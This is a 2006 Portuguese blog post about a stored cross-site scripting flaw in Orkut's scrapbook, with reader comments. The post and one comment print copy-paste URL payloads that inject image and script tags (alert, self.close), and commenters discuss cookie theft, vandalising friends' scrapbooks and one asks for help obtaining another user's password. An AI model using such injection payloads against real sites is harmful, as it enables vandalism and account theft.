Adwords

Interessado em fazer dinheiro anunciando no Google?

Celular

Produtos do Google para seu celular favorito ou para o iPhone? Você encontra tudo aqui!

Gmail

Considerado um dos melhores Webmails do Mundo, o Gmail não pára de inovar!

Opensocial

Tudo sobre a plataforma de aplicativos para Redes Sociais do Google!

Orkut

Tudo sobre a Rede Social do Google, a mais popular no Brasil!

Início » Geral

Falha de segurança grave é encontrada no Orkut

Enviado por em domingo, 13 agosto 200645 Comentários
Os usuários Victor Pencak e Steven Conte reportaram uma falha de segurança grave no sistema de recados do Orkut. Graças ao bug, as pessoas podem inserir scripts, imagens e vídeos nos recados. Embora o conteudo pareça inofensivo, os scripts e imagens podem explorar falhas no navegador e no sistema, causando danos que variam de simples instabilidades à Vírus e Malwares em geral. Por isso recomendamos muito cuidado com o uso do serviço enquanto o bug não é corrigido.
Para enviar uma imagem a um amigo, basta copiar a url abaixo, substituindo endereco_da_imagem pelo local onde a foto se encontra armazenada.

http://www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%3D%22
endereco_da_imagem

%22%3E%3Ca%20style%3D%22display%3Anone%22%20href%3D%22%3C/a%3E

*Url dividida em linhas para facilitar a vizualização

O mesmo código pode ser usado para implantar pequenos scripts. O exemplo à seguir dispara uma caixa de mensagens com o uso da função alert(); Novamente, basta copiar e colar.


http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3ealert%28%22
Oi!!%22%29%3c/script%3e%3ca%20style=%22display%3anone%22%20href=%22/

*Url dividida em linhas para facilitar a vizualização

O Google ainda não se pronunciou sobre o assunto.

Popularity: 4% [?]

45 Comentários »

  • Sonic Nix disse:
    Opera [www.opera.com] também é bem seguro.

    Ah, e o segundo código, é mais conhecido como “Fodedor de Scrapbook”, ele não pode ser deletado e pode bugar todo o scrapbook, (sumir com scraps antigos, bloquear postagem de novos scraps).

  • César de Tassis Filho disse:
    Realmente faz sentido o que o Sonic disse.
    Tanto o sistema que posta nos scrapbooks quanto o sistema que apaga scraps é escrito em javascript, podendo assim “qualquer pessoa” escrever um código para, por exemplo, apagar todos os scraps.
    Este novo template do Orkut.com está muito bugado! JavaScripts ferrados por todos os lados… E eu não tenho visto eles corrigirem tais. Só espero que não tenham abandonado o projeto 😛
  • Estivem disse:
    concerteza é de má fé do orkut, pois tais bugs sao facilmente descobertos, tornando assim a proliferação do mozilla bem rapida !

    eu axo issu

  • Anonymous disse:
    Eu gostei 😀
  • FiReHaWkZ disse:
    O negócio é parar de usar orkut e começar a usar algo mais útil e com mais funções, como o Multiply e o MySpace. Uma pena que orkut “infectou” o Brasil e ninguém pensa em mudar de posição quanto a isso. Talvez porque o orkut seja o site mais próximo do nosso país: bagunça, fofoca, insegurança, falta de privacidade, vandalismo, inutilidades, burocracia, etc etc etc…
  • Thiago disse:
    firehawkz…
    falou tudo.
    quero sair do orkut, mas pessoas insistem a fazer daquilo um messenger. :S
    curto o myspace, apesar de não usar muito por não conhecer ninguém que tenha um, mas sei lá, cansei da cara do orkut. :S
    é isso aew, flw!
  • Ricardo Braida disse:
    Vou deixar de acessar minha conta enquanto isso não for resolvido.
  • FiReHaWkZ disse:
    Putz tão colocando até vídeo do YouTube no orkut já… Que palhaçada!
  • Anonymous disse:
    tah realmente foda o orkut… o virus da foto jah virou piada entre os usuarios… volte e meia recebo um scrap “olhe as fotos da festa…” daí lah vou eu mandar o link do antivirus do linha defensiva da UOL…

    e esses codigos… aff… ningem merece…

    concordo com mta gente q chama d orkú…

  • Infonline disse:
    falaram uns absurdos monstros hein, o orkut bugo o site para ajuda a mozzila foi demais…
    os caras estaum refazendo um site q é visitado por milhoes de pessoas, assim é facil achar erros, tem milhoes de nego sem oq fazer para achar…
    o site ta mais rapido, mais leve, e ficando mais funcional…
    agora so teve a onda de virus de imagens porque pessoas burras e curiosas nao ve oq clicam…, um errinho voces ja estao falando em deletar scraps em massas, nada é assim gente… calma!
  • kblo disse:
    tem como arrumar o scrapbook? :S
    se tiver como me mande pro email leonardozamboni2@gmail.com

    fui tentar usar o codigo al ie deu problema
    valeu
    😉

  • Estivem disse:
    @ FiReHaWkZ

    concordo com vc qdo diz q o orkut é igualsinho ao brasil, o fueda é q eu nao consigo gostar do myspace, e esse Multiply eu nao conheço, passa o site alguem pra mim por favor, pq orkut, ta um orkú msm !

    flw abraçus

  • Anonymous disse:
    fui testar esse script da caixa de mensagem no meu scrap e fiquei com um scrap vazio “indeletavel” 😛

    alguem sabe como reparar esse erro? ou soh esperando o pessoal do orkut ajeitar?

  • Anonymous disse:
    Se alguém aí souber como deleta esse scrap vazio “indeletável” me manda um email please
    christianoguedes@gmail.com

    Obrigado…

  • Fernando Rigotti disse:
    lol zuei scrapbook de uma amiga sem querer.
    Não tem como deletar também…

    que foda! UAHAUAHAAUAH

    esse é um bom método para quem queria deletar todos os scraps UAHAUAHAUAHAU

  • FiReHaWkZ disse:
    @ estivem

    O endereço do Multiply é http://www.multiply.com
    Se quiser dá uma passada no meu perfil lá http://firehawkz.multiply.com
    Recomendo a todos, pois a página do perfil é totalmente customizável, pode-se hospedar vídeos (importa do YouTube e Google Video), fotos (importa do flickr e ImageShack), músicas (importa não sei da onde mas importa…rs), receitas, favoritos, calendário, blog, notas e muito mais.
    E lá já tem uma comunidade razoavelmente grande de brasileiros.

    É isso aí, abraços.

  • Ítalo disse:
    fernando fiz o mesmo q tuh
    auiaihIUahiuHa
    keria apagar o scrap ki fica..se alguem souber!

    italovaz@hotmail.com

  • Fernando Rigotti disse:
    Ae para quem postou recado no scrapbook e sumiu tudo, inclusive o link para deletar o scrap.

    Para resolver isto apenas deixe mais 9 recados consecutivos. Isto fará com que apareça novamente o link de “próxima página”.

    Simples :]

  • Anonymous disse:
    descobri como corrigir, coloca na barra de endereços:

    javascript:void(document.body.innerHTML=document.body.innerHTML.replace(/script/gim,’i’));

    o scrap indeletavel vira deletavel….

  • Pedro Cab disse:
    Já tem jeito de colocar vídeos do YouTube também, postei até em meu blog sobre o assunto. PortalCab.com
  • kblo disse:
    valeu anonimo =]
  • Anonymous disse:
    valeu anonimo que deu a dica de como arrumar o scrabook
  • Anonymous disse:
    Ruim para o Google, pois devido comentários “acidos” comparando o Google com a Microsoft, isso pode diminuir a confiabilidade da marca Google no mercado.
  • Marcus Danillo disse:
    “Por isso recomendamos o uso do Mozilla Firefox, o navegador mais seguro disponível no mercado.”

    Ôpa! Aí é que está o problema, os caras deram um jeito de capturar os cookies alheios explorando esse bug. E adivinha em que navegador essa falha ocorre? Ganhou um doce quem respondeu Firefox. Isso mesmo, essa vulnerabilidade não existe no Internet Explorer.

    Se quiserem mais informações, entrem em contato comigo.

  • Anonymous disse:
    Inclusive no firefox eu posso alterar a script para

    http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3eself.close%28%22%22%29%3c/script%3e%3ca%20style=%22display%3anone%22%20href=%22/

    e ele fechará sozinho, sem perguntar nada!!!! O IE pelo menos avisa que a tela será fechada e permite impedir a ação.

  • Anonymous disse:
    mesmo com essas supostas falhas, o firefox ainda é bem melhor q o IE…
  • Kicca disse:
    Cliquei num desses links que pega informações da conta ao visitar o perfil de uma colega e clicar no link para deixar um scrap. Adianta somente mudar a senha da conta Google (mudei imediatamente) ou uma medida mais drástica se faz necessária?

    Na boa? Já passou da hora da Google dar um jeito no Orkut. Sei que a maior parte da culpa é de usuários mal intensionados e de usuários tolos que informam login e senha em sites para mandar scraps bonitinhos para todos os contatos, quando o próprio Orkut tem o envio de mensagens a todos da lista; ainda assim a Google deveria tomar uma atitude mais séria.

    No momento é só o Orkut que está com má fama (reduto da pilantragem e coisas bem piores); num futuro próximo poderá ser a Google a ficar com má fama.

    Gosto do Orkut. Se bem utilizada e bem administrada é uma ferramenta maravilhosa para todo tipo de pesquisa. Foi graças ao Orkut que decidi comprar determinada câmera digital, após ler relatos numa comunidade para quem tinha aquele modelo; foi no Orkut que fiquei sabendo de um defeito de fabricação da antiga máquina e que a Canon conserta o problema gratuitamente e foi o Orkut que me reaproximou de pessoas com quem estudei no Jardim de Infância!

    Acredito que o Orkut ainda tenha salvação.

  • Ricardo Braida disse:
    Mas desabilitando o JavaScript no Firefox (Preferences > Content) é possível se safar do bug… o ruim é que não se pode enviar nenhum texto (scrap ou post), ou seja, o Orkut fica em ‘read-only’.
  • Gabriel AT disse:
    Ricardo, a solução não seria então manter o javascript desabilitado e habilitá-lo somente quando for postar algo? É trabalhoso, mas ao menos garante um mínimo de segurança…

    ps.: O post do blog deveria ter um alerta para o fato desse segundo código ser o “fodedor de scrapbook”

  • SpyGamer disse:
    @infoline:

    Não se tratam de “absurdos monstros” como você disse. Antes de mais nada, eu gostaria de exclarecer que essa falha de segurança não requer intervenção do usuário. Por isso, não importa seu nível de conhecimento ou sua capacidade de identificar um botão malicioso, pois tudo acontece automaticamente.

    Quanto ao Firefox, ele de fato ajuda. Linguagens de script são limitadas pelo aplicativo que as executa. Isso significa que você esta mais seguro em um navegador que tenha menos falhas e que impeça o acesso ao sistema através do script.

    @Marcus Danillo:

    “Essa vulnerabilidade” realmente não existe no internet explorer. Mas o que dizer à respeito das dezenas de outras? Outro aspecto a ser considerado é o fato de o firefox ter seu código aberto.

  • Victor Pencak disse:
    ATENÇÃO!!!!

    Foi confirmado que já existem codigos que enviam o cookies para, consequentemente, as senhas do orkut.
    Quem quizer estou disponibilizando um script que impede que esses códigos funcionem.

    http://files.myopera.com/Luiz%20Fernando/userjs/roubo.js

    Uso ele no Opera, ainda não testei no firefox.

  • Bruno B. disse:
    eu gostei.. haiusdhuasdaiushdausihdaisd
    nao gostei de vc.. fodo seu scrapbook, gostei,, te mando uma imagem legal.. hasiudhuaihsduiasd
    =]]]
    (6)
  • Infonline disse:
    @SpyGamer,

    em primeirao mao nao tinha testado o script ainda, pelo que lia na noticia nao parecia algo taum grande, e decorrente aos comentarios fico conclusivo isso, ainda nao acredito q posso haver o roubo de senhas por exemplo, ou mesmo instalacao de um verme ou algo do tipo na propria maquina….

  • Thiago disse:
    E agora já foi corrigido… Rápido o Google, não?
  • Bruno B. disse:
    era bem o ke eu ia falar agora.. asuduhaisd mas avisei o nando antes.. =P
    asdhiuahduiasd
  • Anonymous disse:
    acabaram de arrumar o bug!
    que raiva! heheheh
  • Anonymous disse:
    hahhahaha… duas pessoas disseram comigo…. :(
    que raiva… tava muito doido o youtube!
  • Anonymous disse:
    Acabou a brincadeira.
    Agora só na proxima vez
    kuakuakuakuakuakuakuakua.

    by C3r34l

  • SpyGamer disse:
    @Infoline:

    O “poder de fogo” do JavaScript e do HTML é limitado pelo navegador utilizado. Uma possível falha nesse navegador poderia trazer conseqüências graves caso o código a ser interpretado fosse malicioso.

    Veja como exemplo a Wikipédia e os fóruns em php. Eles não têm uma linguagem própria para os posts atoa. Isso é feito por medida de segurança, para evitar que usuários mal intencionados insiram código malicioso de qualquer natureza no site.

    Embora tenha testado alguns scripts enquanto a falha esteve ativa, eu não tentei obter o document.cookie(); para saber se esse funcionaria, mas acredito que sim.

  • junior disse:
    mas como faremos quando o nosso pc fica com instabilidades na pagina do orkut?
  • ana paula disse:
    eu entro no orkut normalmente mas ñ consigo mandar recados p/ ninguem
    queria saber como arrumar isso
  • Axys disse:
    Será q alguém aki sabe como mandar códigos Javascript nos recados do orkut é pq ele bloqueia!
    Plizzzzzzzzzz
  • […] tinha lido faz um tempo, aqui e aqui. Até então não dei muito importância para esse bug, achei que ia ser arrumado antes que […]
  • aninha disse:
    Queria ter acesso aos scraps bloqueados, mas sei q hj isso é impossível, pensei então em descobrir o loginn e a senha do orkut. Alguém pode me ajudar? por favor? bjs
  • ariel disse:
    não da pra eu responder recados para meus amigos do orkut.